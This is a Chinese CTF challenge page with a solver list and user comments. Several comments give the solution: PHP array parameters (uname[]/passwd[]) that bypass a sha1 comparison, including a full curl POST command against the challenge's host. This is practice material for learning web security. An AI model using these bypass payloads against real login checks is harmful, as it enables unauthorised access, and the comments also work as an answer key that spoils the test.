评分(4)
解题动态

Julia 攻破了该题 28分钟前

牧之雪夜 攻破了该题 1小时前

ChangQing 攻破了该题 4小时前

17361232956 攻破了该题 5小时前

xiemeimei 攻破了该题 9小时前

207439410 攻破了该题 11小时前

Fenix 攻破了该题 14小时前

932041046 攻破了该题 15小时前

orange2015 攻破了该题 1天前

hanzkj 攻破了该题 1天前

2970507147 攻破了该题 1天前

zcgzcx1234 攻破了该题 1天前

2757547892 攻破了该题 2天前

zzy1223 攻破了该题 2天前

欲语泪先流 攻破了该题 2天前

walkerming 攻破了该题 3天前

吴王饭差 攻破了该题 3天前

huangyujie 攻破了该题 3天前

1234567nxb 攻破了该题 3天前

评论
zxcvbnmzhang 6天前
举报
curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"
asddddd 18天前
举报
我用0e绕过sha1为啥不行,为什么只能数组绕过
一个姓⎝李⎠的师傅~ 1月前
举报
题目挺好,各种细节和基础知识的考验,基础知识恶补: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#VbWHy
ubudj 1月前
举报
?uname[]=1&id=margin POST: passwd[]=2
zhenhui 1月前
举报
GET: ?uname[]=1&id=margin POST: passwd[]=2
wywsssf 1月前
举报
链接后面加?uname[]=1&id=margin,同时POST中passwd[]=2
ctfer-pls 2月前
举报
GET:id=margin&uname[]=111a POST:passwd[]=2bba
2686213396 2月前
举报
flag{*********}
2686213396 2月前
举报
我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计
iNMB 2月前
举报
很奇怪bp不行,用其他方法可以不知道为什么